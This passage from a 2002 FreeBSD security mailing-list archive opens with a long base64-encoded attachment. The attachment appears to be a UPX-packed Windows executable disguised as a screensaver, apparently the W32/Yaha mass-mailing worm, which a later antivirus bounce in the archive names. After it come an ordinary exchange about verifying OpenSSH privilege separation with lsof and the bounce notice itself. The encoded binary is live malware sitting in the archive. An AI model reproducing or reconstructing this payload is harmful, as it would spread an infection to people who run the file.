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 ifl5Bw+3B0dQR7lXSPKuVf+WvEcBAAnAdAeJA4PDBOvY/5bARwEAYek7Hf//AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAGJz3epai1ErtTDCkzrTECkvWlRS+DdsaNzmxILyDzX0tC2GuF6lVYFIACipLZ+IUfiKnAx9t yqdLhV4YmUfrQfUJbuaNH1lp57aQPpc8lZGgkpeaUh6Utd50o18zsWXBTLBgRlmomCFRkhTKFcc2 mLzwpACNOaG4HXJMUmYSk6o5nGTTksky20ce6cLYdSko1IAEe8iX0/FKDT07l9hFCQ2vriQCA8iQ uShe8NZqu6GJpc1xpTtoECFV9cMXFtqpRBdCbixreLHcwId3iLF4BlhuEkN2iFpmSZR0cam9MdOb WkNOQx6zcyGgwIdTS0IMFQPan2cuxMLPizr0JcmJjxRjuEc/Gpp9Gn0SYyDwxOze50EOPIKNyPQ4 9D+5vYpazHi1Mt0InBCkm79NmS72bewgSVdojdSGRuhWDZYkdEgoKCSxVI6jKN2EucJUczYXzNDg V1RpU5FTiORRcWsHIdJg6q3oFysiAhREQVQDcbs/swT5ywswZAn0NVHrs18UiWgfNVPpEkKal0eD kiEDFxizmD+T8wLFhqzFCjQQFCxa6pdWJjGwBmmH2SWrieBegQZtTgzf5hoqch/VL18m25fZETGc 6tPaSuzkBMtGO1ToXmlSWyN2nm1kpRWlblFBoXSVCbDSyXZvDmILJdj5VOi/WIpV+KzVJ93jKeK5 g/dLc78pMaxzeT1vOSprvkRfRm0biGtsABZCqTCqDrI3U2vRdBxl4tq+TxRYegxu5BgBHUynEYaG OgEE1D/yo1o0NNByb3rU3BR0P5FGKQYKhmuvr5gjBpmkyVJdkzG0cQPkOkuoUbuPn6SUtr/cfWSV 6LMV5m9nLF1TW+SP7LVU5zgT1pp7mahQQy+OVI7VAIBCs/J4VkeRF21F1xtUimVz0aWQ9jZkKXCu QO5mu6OIS0ndGBz43rYDI6xiMOfMcebVqjXXkbDIGpR1do5unBF2IWzqt1Fjxd/GVLLnLw3ROWNM TyRLNXDr+OTqe272BzgjLzF+wcGtMvV9CI1RhVCmD8xy8rg+qxbg5gneLxyMQtY+YHTT1qLwU4+C UxZwIlRkCBF8LRN3UMEnQa/kGyXSD+7q8WNVUqrWjUSqGLbp10cJvg5mzVktCr1Su5rWl+TEHVI9 RbLgo7ylZxeqW/d39CrV+RJ4L4qlCtAr7RpwATzLCcDlUSGRT2HpEtoD4uOeXdHAgL9g8HjIKPYy iXBDyYB4CHB0BdlLt9JaWy3CptiQJA62ULCuzAMDgZKUJlUvBAiw2SM4i2zJOrWYTymlYl8TWnul pXcUMcv0y5Eme0RfAXakOM8azVAA8cWBQZVTku+dSgXOoAMg6MpytNyxGzO1L06DULq9PyEZxQZy gKo6MYpBnqk8S9LMi8XYGVwAM4amuHynMJ3AeiA1qL03C/fnIHBzzKdA0tq0uQjnkX2dkezUu3TJ N3zoMG5JoSvneW5gVWR0OhLubxsBtTb4VeYpGvVjenpqh1iZalkFOUUK44BmJFKTUkTfZQGY8/F7 53RN --Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ)-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:11: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by hub.freebsd.org (Postfix) with ESMTP id 239D637B83B for ; Tue, 25 Jun 2002 02:58:28 -0700 (PDT) Received: from [217.82.32.109] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17Mn5e-0002IC-00; Tue, 25 Jun 2002 11:58:26 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 9AF312FA; Tue, 25 Jun 2002 11:58:24 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 58A5E2F0; Tue, 25 Jun 2002 11:58:20 +0200 (CEST) Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? From: Jan Lentfer To: Thomas Seyrat Cc: FreeBSD Security Maillinglist In-Reply-To: <20020625094900.GA13755@lise.hsc.fr> References: <20020625195333.U69343-100000@a2> <902312FB-8813-11D6-919D-0030654D97EC@patpro.net> <20020625094900.GA13755@lise.hsc.fr> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-xukGf0qR1fx8BgwYVU0a" X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 11:57:23 +0200 Message-Id: <1024999044.5380.2.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=-xukGf0qR1fx8BgwYVU0a Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Am Die, 2002-06-25 um 11.49 schrieb Thomas Seyrat: > patpro wrote: > > >I don't see the [priv] bit on the second one. > > >Can you confirm with lsof that the chroot has taken effect? > > well in fact no, nothing about /var/empty in lsof >=20 > While sshd is waiting for password, I have : >=20 > sshd 32666 0,0 0,3 3496 1596 ?? I 11:42 0:00,09 sshd: se= yrat [net] (sshd) >=20 > and lsof -p 32666 | grep rtd gives : >=20 > sshd 32666 sshd rtd VDIR 13,131078 512 4 /var/empty >=20 > This untrusted sshd process is indeed correctly chrooted. I checked that, too. If you are using the openssh-portable port as of today it is running in /usr/empty su-2.05# /usr/local/sbin/lsof -p 5244 | grep rtd sshd 5244 sshd rtd VDIR 116,131077 512 4587008 /usr/empty Regards, Jan --=-xukGf0qR1fx8BgwYVU0a Content-Type: application/pgp-signature; name=signature.asc Content-Description: Dies ist ein digital signierter Nachrichtenteil -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQA9GD6DN1wGzE0LIcgRAscuAJ9ve9QHGg7UvW3qcfnvf6TiYA0oHACgnniX /UUZleUlVE938SbI1Gvh5vI= =Mw6V -----END PGP SIGNATURE----- --=-xukGf0qR1fx8BgwYVU0a-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:24:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from web.htc.sk (ns.htc.sk [195.146.149.36]) by hub.freebsd.org (Postfix) with ESMTP id 68A8737B632 for ; Tue, 25 Jun 2002 03:17:50 -0700 (PDT) From: LNTS/Technical_Support/HTC%HTC X-Priority: 3 (Normal) Date: Tue, 25 Jun 2002 12:17:10 +0200 Subject: Report to Recipient(s) To: Hotel Shefayim Cc: freebsd-security@FreeBSD.ORG Message-ID: X-MIMETrack: Serialize by Router on Domino/HTC(Release 5.0.9 |November 16, 2001) at 25.06.2002 12:18:18 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: Hotel Shefayim , freebsd-security@FreeBSD.ORG Subject: Re: Fw: cookies WARNING: The file .pif you received was infected with the W32/Yaha.g@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:34:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 4610B37B400 for ; Tue, 25 Jun 2002 03:34:15 -0700 (PDT) Date: Tue, 25 Jun 2002 06:34:12 -0400 From: Klaus Steden To: freebsd-security@freebsd.org Subject: all this talk of privilege separation ... Message-ID: <20020625063412.U589@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List 